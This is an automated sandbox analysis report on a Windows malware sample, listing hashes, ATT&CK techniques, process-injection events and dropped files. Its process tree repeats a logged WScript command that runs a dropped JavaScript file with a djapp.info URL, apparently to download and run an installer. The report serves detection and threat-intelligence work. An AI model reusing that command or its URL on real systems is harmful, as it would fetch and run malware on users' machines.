0ed278adc9197c82ea5e2818b2c594c5319b48477b4b31013b62a8f2f40e4532

Analysis

max time kernel
118s
max time network
123s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
15-05-2024 08:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

454472490921081bf9510d4c445de56b_JaffaCakes118.exe
Size

184KB
MD5

454472490921081bf9510d4c445de56b
SHA1

f7e0de4544ff85b3e205043d0cd0eeba52f853bf
SHA256

0ed278adc9197c82ea5e2818b2c594c5319b48477b4b31013b62a8f2f40e4532
SHA512

f43f16b238187a67d789b3da0b24c243b80a6148f943454b4c9d694b7f474bdac0eb7dd7e10a41026fea1b1e995ed1b99bba92945201831dfed934046de1151e
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndn5

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2008	WScript.exe
8	2008	WScript.exe
10	2008	WScript.exe
12	2728	WScript.exe
13	2728	WScript.exe
15	1664	WScript.exe
16	1664	WScript.exe
18	1864	WScript.exe
19	1864	WScript.exe
21	1748	WScript.exe
22	1748	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1276 wrote to memory of 2008	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	28
PID 1276 wrote to memory of 2008	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	28
PID 1276 wrote to memory of 2008	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	28
PID 1276 wrote to memory of 2008	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	28
PID 1276 wrote to memory of 2728	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	30
PID 1276 wrote to memory of 2728	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	30
PID 1276 wrote to memory of 2728	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	30
PID 1276 wrote to memory of 2728	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	30
PID 1276 wrote to memory of 1664	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	32
PID 1276 wrote to memory of 1664	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	32
PID 1276 wrote to memory of 1664	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	32
PID 1276 wrote to memory of 1664	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	32
PID 1276 wrote to memory of 1864	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	34
PID 1276 wrote to memory of 1864	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	34
PID 1276 wrote to memory of 1864	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	34
PID 1276 wrote to memory of 1864	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	34
PID 1276 wrote to memory of 1748	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	36
PID 1276 wrote to memory of 1748	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	36
PID 1276 wrote to memory of 1748	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	36
PID 1276 wrote to memory of 1748	1276	454472490921081bf9510d4c445de56b_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\454472490921081bf9510d4c445de56b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\454472490921081bf9510d4c445de56b_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1276
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE14.js" http://www.djapp.info/?domain=tKmaUgCgwW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE14.exe
  2⤵
  - Blocklisted process makes network request
  PID:2008
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE14.js" http://www.djapp.info/?domain=tKmaUgCgwW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE14.exe
  2⤵
  - Blocklisted process makes network request
  PID:2728
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE14.js" http://www.djapp.info/?domain=tKmaUgCgwW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE14.exe
  2⤵
  - Blocklisted process makes network request
  PID:1664
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE14.js" http://www.djapp.info/?domain=tKmaUgCgwW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE14.exe
  2⤵
  - Blocklisted process makes network request
  PID:1864
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE14.js" http://www.djapp.info/?domain=tKmaUgCgwW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE14.exe
  2⤵
  - Blocklisted process makes network request
  PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
38cd318244297da3b1ea92279369f998

SHA1
a572a44901a386967b2a4ca0f48d36341618fe7c

SHA256
283f838564a9520db7db564acf75104014179994329df8f95978e8911289a0d7

SHA512
991963e08293f54840ad1e9d5c117a3567fe8c463b5ebaa2cd68d5d5ba934fffa2b3758e39159f3d1831aa3d0637a07a202c108fda78f53e10897111e04ff72d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
5a231b21e2d4845c910a7e787e3da310

SHA1
427120e7e555eb7d8abe7790fc76154eb5c17986

SHA256
9b7ec4d947174dd8bd9746d0c42ca6f81938904c25df38adea312f6b99bd8f64

SHA512
50743876c2f30290b366acbc8ac362c98792144e957398d199718140de3ee10a10e51d7e95396efc6d89e6242a2a338831d15e3f96407ca6a9da1c5bd0bcfc05

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f6ad01a81b6516deb75678f0bb709ebe

SHA1
3f313130b159ae6d38cdf86e9ac6881d9ecf7d1e

SHA256
162a1c6774eeb23d95f1ff3dd98c26fa0662dd8f47191696f20b7b17e4414a59

SHA512
ce963b07cdb3de15989a9c80c610dfeb0ae21fa345399c099ed639060cc71cb4f53a08b23e05768289e78293f4f6049abf1db1d9d8648313eab29ac7a7ab4fc2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
bf7c395298bc460047e946a148663213

SHA1
88d073e53ccc69c9c1f2381b554c99c693e7bc14

SHA256
90ebbea27e5bb30a2810cae2b7bc7e1f98d033d71946f1184508a273aacd20a3

SHA512
b94912ebb3ebd115aae88104a78ebe7fe9264ab250410d1d9d556fd2be09a31263760bd11e950c3625c8c1a1939693971cd6e43a08bdebaf77ceb4f5e115b653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
40KB

MD5
084e74b2356a51d3252356f7e2f2657d

SHA1
b281ec0a2e032a733c40375fd33c5914a28ace4f

SHA256
9c2c291fb71907af4dbe2ba4295f80ec3d756a2de27eca6877021a3ae2382733

SHA512
65c122fc3625ef567b744a650ae0e44696fa849e3d7ae3dae8d3f720e99ebea3f2b1fd5f4d48bf65ec10e4f6eb2b3ea63b7166662096f98e09e456b3cded4555

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
6KB

MD5
7d94f83cfdb38fa525bda17b90acf4a2

SHA1
a3a1d576bd4862e35bacb5c924c9d138d5dda2a5

SHA256
be71132f6f62a84208ce4a363d5062b24e0da3c1339d2fcb89612fec8cba4c1f

SHA512
90518584c5df8f66725d0d531aa78839d35fd90380b39e3d2ca54d8a94611b5cab37d32db795cb5497e348254631ee3a6fd912f85884c564e830b6e9fd8e38ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
5bef42d17080c5e4ae02196bcdee2c2f

SHA1
173fd601e43cb1f01bd809070236eff316092639

SHA256
ba21b16237752736b090c5ac045d9bbc40f5d0293b4a2d9f76df76344c598477

SHA512
ce6544a78b6eaa0a3f15eabd986e2a647a6139a09e607b0073b0b604b7a3bc25a207cd56ff3aae27a5fe799315848fe9e05fba3cbb0fd240266c6c4a84df8f25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
40KB

MD5
b8c3a976220ed120c7f65a6d8f94c9ab

SHA1
7adb7f966f5b371d41a7eb8bd80d2d64dc789206

SHA256
6e7b6a25a1b3e2dfa923703f7a063d0ae891df79f6d54eea74de4affefd68e91

SHA512
bdd0bb24244ddcadcd2a84feeb18fe5df2120a60f0b8da2ab6f11d9ed21a1a263c8c3bff1d6e353a3165febff65d4e24001c84923f4ce7dcf877209a0de34b82

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3D10.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5561.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufE14.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Q7Q5G9X6.txt

Filesize
177B

MD5
81c8b4d9d2953ff18611dddedb1c4cf9

SHA1
79dcde4fdd34addf365999f3a09f4e696d0a0909

SHA256
4f7e17a57d5b8ac22dbf5a4d91bc5e2ce1459778d2eb1930dd8b9430ba24b72b

SHA512
ff27150326ebbf69f56001b1b172b752f9e97f199352d5c4b26cc1fcb0ee0d78a28dcfb3c8001a86f30d93c25bdec36b6ddead024db34f7440d95c4ce5d18985

Download Submit